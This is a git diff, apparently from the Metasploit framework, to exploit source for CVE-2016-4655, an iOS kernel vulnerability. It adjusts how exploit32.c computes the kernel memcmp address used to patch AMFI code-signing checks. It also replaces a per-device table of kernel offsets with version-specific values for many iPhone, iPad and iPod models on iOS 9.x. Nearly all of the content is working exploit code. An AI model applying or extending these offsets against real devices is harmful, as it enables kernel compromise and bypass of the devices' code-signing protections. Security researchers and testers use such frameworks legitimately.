diff --git a/external/source/exploits/CVE-2016-4655/exploit32.c b/external/source/exploits/CVE-2016-4655/exploit32.c index 688ecae994..83644a4bb2 100644 --- a/external/source/exploits/CVE-2016-4655/exploit32.c +++ b/external/source/exploits/CVE-2016-4655/exploit32.c @@ -1263,7 +1263,7 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr) amfi_macho = (void*)((uint32_t)amfi_macho - 0x1000); } - uint32_t memcmp_what = kernel_start + find_memcmp(); + uint32_t memcmp_what = kernel_start + find_memcmp() + 1; debug_print("memcmp_what %p\n", (void*)(memcmp_what)); uint32_t amfi_memcmp_off; for (amfi_memcmp_off = amfi_macho_start; amfi_memcmp_off < kernel_size; amfi_memcmp_off += 4) { diff --git a/external/source/exploits/CVE-2016-4655/offsets32.c b/external/source/exploits/CVE-2016-4655/offsets32.c index 295e572ab0..98ceab6a63 100644 --- a/external/source/exploits/CVE-2016-4655/offsets32.c +++ b/external/source/exploits/CVE-2016-4655/offsets32.c @@ -2810,138 +2810,134 @@ static inline unsigned int find_mac_proc_check(void) { /*3588 0x000c3c80 0x800c4c80 GLOBAL FUNC 0 _memcmp*/ static inline unsigned int find_memcmp(void) { switch (target_environment) { - case iPhone41_iOS902: return 0xc3c80; - case iPhone41_iOS910: return 0xc3c80; - case iPhone41_iOS920: return 0xc3c80; - case iPhone41_iOS921: return 0xc3c80; - case iPhone41_iOS930: return 0xc3c80; - case iPhone41_iOS931: return 0xc3c80; - case iPhone41_iOS932: return 0xc3c80; - case iPhone41_iOS933: return 0xc3c80; - case iPhone41_iOS934: return 0xc3c80; - case iPhone51_iOS910: return 0xc3c80; - case iPhone51_iOS920: return 0xc3c80; - case iPhone51_iOS921: return 0xc3c80; - case iPhone51_iOS930: return 0xc3c80; - case iPhone51_iOS931: return 0xc3c80; - case iPhone51_iOS932: return 0xc3c80; - case iPhone51_iOS933: return 0xc3c80; - case iPhone51_iOS934: return 0xc3c80; - case iPhone52_iOS902: return 0xc3c80; - case iPhone52_iOS910: return 0xc3c80; - case iPhone52_iOS920: return 0xc3c80; - case iPhone52_iOS921: return 0xc3c80; - case iPhone52_iOS930: return 0xc3c80; - case iPhone52_iOS931: return 0xc3c80; - case iPhone52_iOS932: return 0xc3c80; - case iPhone52_iOS933: return 0xc3c80; - case iPhone52_iOS934: return 0xc3c80; - case iPhone53_iOS910: return 0xc3c80; - case iPhone53_iOS920: return 0xc3c80; - case iPhone53_iOS921: return 0xc3c80; - case iPhone53_iOS930: return 0xc3c80; - case iPhone53_iOS931: return 0xc3c80; - case iPhone53_iOS932: return 0xc3c80; - case iPhone53_iOS933: return 0xc3c80; - case iPhone53_iOS934: return 0xc3c80; - case iPhone54_iOS910: return 0xc3c80; - case iPhone54_iOS920: return 0xc3c80; - case iPhone54_iOS921: return 0xc3c80; - case iPhone54_iOS930: return 0xc3c80; - case iPhone54_iOS931: return 0xc3c80; - case iPhone54_iOS932: return 0xc3c80; - case iPhone54_iOS933: return 0xc3c80; - case iPhone54_iOS934: return 0xc3c80; - case iPad21_iOS910: return 0xc3c80; - case iPad21_iOS920: return 0xc3c80; - case iPad21_iOS921: return 0xc3c80; - case iPad21_iOS930: return 0xc3c80; - case iPad21_iOS931: return 0xc3c80; - case iPad21_iOS932: return 0xc3c80; - case iPad21_iOS933: return 0xc3c80; - case iPad21_iOS934: return 0xc3c80; - case iPad22_iOS910: return 0xc3c80; - case iPad22_iOS920: return 0xc3c80; - case iPad22_iOS921: return 0xc3c80; - case iPad22_iOS930: return 0xc3c80; - case iPad22_iOS931: return 0xc3c80; - case iPad22_iOS932: return 0xc3c80; - case iPad22_iOS933: return 0xc3c80; - case iPad22_iOS934: return 0xc3c80; - case iPad23_iOS910: return 0xc3c80; - case iPad23_iOS920: return 0xc3c80; - case iPad23_iOS921: return 0xc3c80; - case iPad23_iOS930: return 0xc3c80; - case iPad23_iOS931: return 0xc3c80; - case iPad23_iOS932: return 0xc3c80; - case iPad23_iOS933: return 0xc3c80; - case iPad23_iOS934: return 0xc3c80; - case iPad24_iOS910: return 0xc3c80; - case iPad24_iOS920: return 0xc3c80; - case iPad24_iOS921: return 0xc3c80; - case iPad24_iOS930: return 0xc3c80; - case iPad24_iOS931: return 0xc3c80; - case iPad24_iOS932: return 0xc3c80; - case iPad24_iOS933: return 0xc3c80; - case iPad24_iOS934: return 0xc3c80; - case iPad25_iOS902: return 0xc3c80; - case iPad31_iOS910: return 0xc3c80; - case iPad31_iOS920: return 0xc3c80; - case iPad31_iOS921: return 0xc3c80; - case iPad31_iOS930: return 0xc3c80; - case iPad31_iOS931: return 0xc3c80; - case iPad31_iOS932: return 0xc3c80; - case iPad31_iOS933: return 0xc3c80; - case iPad31_iOS934: return 0xc3c80; - case iPad32_iOS910: return 0xc3c80; - case iPad32_iOS920: return 0xc3c80; - case iPad32_iOS921: return 0xc3c80; - case iPad32_iOS930: return 0xc3c80; - case iPad32_iOS931: return 0xc3c80; - case iPad32_iOS932: return 0xc3c80; - case iPad32_iOS933: return 0xc3c80; - case iPad32_iOS934: return 0xc3c80; - case iPad33_iOS902: return 0xc3c80; - case iPad33_iOS910: return 0xc3c80; - case iPad33_iOS920: return 0xc3c80; - case iPad33_iOS921: return 0xc3c80; - case iPad33_iOS930: return 0xc3c80; - case iPad33_iOS931: return 0xc3c80; - case iPad33_iOS932: return 0xc3c80; - case iPad33_iOS933: return 0xc3c80; - case iPad33_iOS934: return 0xc3c80; - case iPad34_iOS910: return 0xc3c80; - case iPad34_iOS920: return 0xc3c80; - case iPad34_iOS921: return 0xc3c80; - case iPad34_iOS930: return 0xc3c80; - case iPad34_iOS931: return 0xc3c80; - case iPad34_iOS932: return 0xc3c80; - case iPad34_iOS933: return 0xc3c80; - case iPad34_iOS934: return 0xc3c80; - case iPad35_iOS910: return 0xc3c80; - case iPad35_iOS920: return 0xc3c80; - case iPad35_iOS921: return 0xc3c80; - case iPad35_iOS930: return 0xc3c80; - case iPad35_iOS931: return 0xc3c80; - case iPad35_iOS932: return 0xc3c80; - case iPad35_iOS933: return 0xc3c80; - case iPad35_iOS934: return 0xc3c80; - case iPad36_iOS910: return 0xc3c80; - case iPad36_iOS920: return 0xc3c80; - case iPad36_iOS921: return 0xc3c80; - case iPad36_iOS930: return 0xc3c80; - case iPad36_iOS931: return 0xc3c80; - case iPad36_iOS932: return 0xc3c80; - case iPad36_iOS933: return 0xc3c80; - case iPad36_iOS934: return 0xc3c80; - case iPod51_iOS910: return 0xc3c80; - case iPod51_iOS920: return 0xc3c80; - case iPod51_iOS921: return 0xc3c80; - case iPod51_iOS930: return 0xc3c80; - case iPod51_iOS931: return 0xc3c80; - case iPod51_iOS932: return 0xc3c80; - case iPod51_iOS933: return 0xc3c80; - case iPod51_iOS934: return 0xc3c80; + case iPhone41_iOS934: return 0x000c085c; + case iPhone41_iOS933: return 0x000c085c; + case iPhone41_iOS932: return 0x000c08ec; + case iPhone41_iOS930: return 0x000c08dc; + case iPhone41_iOS921: return 0x000bfd7c; + case iPhone41_iOS920: return 0x000bfd2c; + case iPhone41_iOS910: return 0x000c1340; + case iPhone41_iOS902: return 0x000c11d0; + case iPhone51_iOS934: return 0x000c3e10; + case iPhone51_iOS933: return 0x000c3e10; + case iPhone51_iOS932: return 0x000c3c80; + case iPhone51_iOS930: return 0x000c3c90; + case iPhone51_iOS921: return 0x000c2ff0; + case iPhone51_iOS920: return 0x000c2fb0; + case iPhone51_iOS910: return 0x000c42c4; + /*case iPhone51_iOS902: return 0x000c4124;*/ + case iPhone52_iOS934: return 0x000c3e10; + case iPhone52_iOS933: return 0x000c3e10; + case iPhone52_iOS932: return 0x000c3c80; + case iPhone52_iOS930: return 0x000c3c90; + case iPhone52_iOS921: return 0x000c2ff0; + case iPhone52_iOS920: return 0x000c2fb0; + case iPhone52_iOS910: return 0x000c42c4; + case iPhone52_iOS902: return 0x000c4124; + case iPhone53_iOS934: return 0x000c3e10; + case iPhone53_iOS933: return 0x000c3e10; + case iPhone53_iOS932: return 0x000c3c80; + case iPhone53_iOS930: return 0x000c3c90; + case iPhone53_iOS921: return 0x000c2ff0; + case iPhone53_iOS920: return 0x000c2fb0; + case iPhone53_iOS910: return 0x000c42c4; + /*case iPhone53_iOS902: return 0x000c4124;*/ + case iPhone54_iOS934: return 0x000c3e10; + case iPhone54_iOS933: return 0x000c3e10; + case iPhone54_iOS932: return 0x000c3c80; + case iPhone54_iOS930: return 0x000c3c90; + case iPhone54_iOS921: return 0x000c2ff0; + case iPhone54_iOS920: return 0x000c2fb0; + case iPhone54_iOS910: return 0x000c42c4; + /*case iPhone54_iOS902: return 0x000c4124;*/ + case iPad21_iOS934: return 0x000c085c; + case iPad21_iOS933: return 0x000c085c; + case iPad21_iOS932: return 0x000c08ec; + case iPad21_iOS930: return 0x000c08dc; + case iPad21_iOS921: return 0x000bfd7c; + case iPad21_iOS920: return 0x000bfd2c; + case iPad21_iOS910: return 0x000c1340; + /*case iPad21_iOS902: return 0x000c11d0;*/ + case iPad22_iOS934: return 0x000c085c; + case iPad22_iOS933: return 0x000c085c; + case iPad22_iOS932: return 0x000c08ec; + case iPad22_iOS930: return 0x000c08dc; + case iPad22_iOS921: return 0x000bfd7c; + case iPad22_iOS920: return 0x000bfd2c; + case iPad22_iOS910: return 0x000c1340; + /*case iPad22_iOS902: return 0x000c11d0;*/ + case iPad23_iOS934: return 0x000c085c; + case iPad23_iOS933: return 0x000c085c; + case iPad23_iOS932: return 0x000c08ec; + case iPad23_iOS930: return 0x000c08dc; + case iPad23_iOS921: return 0x000bfd7c; + case iPad23_iOS920: return 0x000bfd2c; + case iPad23_iOS910: return 0x000c1340; + /*case iPad23_iOS902: return 0x000c11d0;*/ + case iPad24_iOS934: return 0x000c085c; + case iPad24_iOS933: return 0x000c085c; + case iPad24_iOS932: return 0x000c08ec; + case iPad24_iOS930: return 0x000c08dc; + case iPad24_iOS921: return 0x000bfd7c; + case iPad24_iOS920: return 0x000bfd2c; + case iPad24_iOS910: return 0x000c1340; + /*case iPad24_iOS902: return 0x000c11d0;*/ + case iPad31_iOS934: return 0x000c085c; + case iPad31_iOS933: return 0x000c085c; + case iPad31_iOS932: return 0x000c08ec; + case iPad31_iOS930: return 0x000c08dc; + case iPad31_iOS921: return 0x000bfd7c; + case iPad31_iOS920: return 0x000bfd2c; + case iPad31_iOS910: return 0x000c1340; + /*case iPad31_iOS902: return 0x000c11d0;*/ + case iPad32_iOS934: return 0x000c085c; + case iPad32_iOS933: return 0x000c085c; + case iPad32_iOS932: return 0x000c08ec; + case iPad32_iOS930: return 0x000c08dc; + case iPad32_iOS921: return 0x000bfd7c; + case iPad32_iOS920: return 0x000bfd2c; + case iPad32_iOS910: return 0x000c1340; + /*case iPad32_iOS902: return 0x000c11d0;*/ + case iPad33_iOS934: return 0x000c085c; + case iPad33_iOS933: return 0x000c085c; + case iPad33_iOS932: return 0x000c08ec; + case iPad33_iOS930: return 0x000c08dc; + case iPad33_iOS921: return 0x000bfd7c; + case iPad33_iOS920: return 0x000bfd2c; + case iPad33_iOS910: return 0x000c1340; + /*case iPad33_iOS902: return 0x000c11d0;*/ + case iPad34_iOS934: return 0x000c3e10; + case iPad34_iOS933: return 0x000c3e10; + case iPad34_iOS932: return 0x000c3c80; + case iPad34_iOS930: return 0x000c3c90; + case iPad34_iOS921: return 0x000c2ff0; + case iPad34_iOS920: return 0x000c2fb0; + case iPad34_iOS910: return 0x000c42c4; + /*case iPad34_iOS902: return 0x000c4124;*/ + case iPad35_iOS934: return 0x000c3e10; + case iPad35_iOS933: return 0x000c3e10; + case iPad35_iOS932: return 0x000c3c80; + case iPad35_iOS930: return 0x000c3c90; + case iPad35_iOS921: return 0x000c2ff0; + case iPad35_iOS920: return 0x000c2fb0; + case iPad35_iOS910: return 0x000c42c4; + /*case iPad35_iOS902: return 0x000c4124;*/ + case iPad36_iOS934: return 0x000c3e10; + case iPad36_iOS933: return 0x000c3e10; + case iPad36_iOS932: return 0x000c3c80; + case iPad36_iOS930: return 0x000c3c90; + case iPad36_iOS921: return 0x000c2ff0; + case iPad36_iOS920: return 0x000c2fb0; + case iPad36_iOS910: return 0x000c42c4; + /*case iPad36_iOS902: return 0x000c4124;*/ + case iPod51_iOS934: return 0x000c085c; + case iPod51_iOS933: return 0x000c085c; + case iPod51_iOS932: return 0x000c08ec; + case iPod51_iOS930: return 0x000c08dc; + case iPod51_iOS921: return 0x000bfd7c; + case iPod51_iOS920: return 0x000bfd2c; + case iPod51_iOS910: return 0x000c1340; + /*case iPod51_iOS902: return 0x000c11d0;*/ default: return 0; } }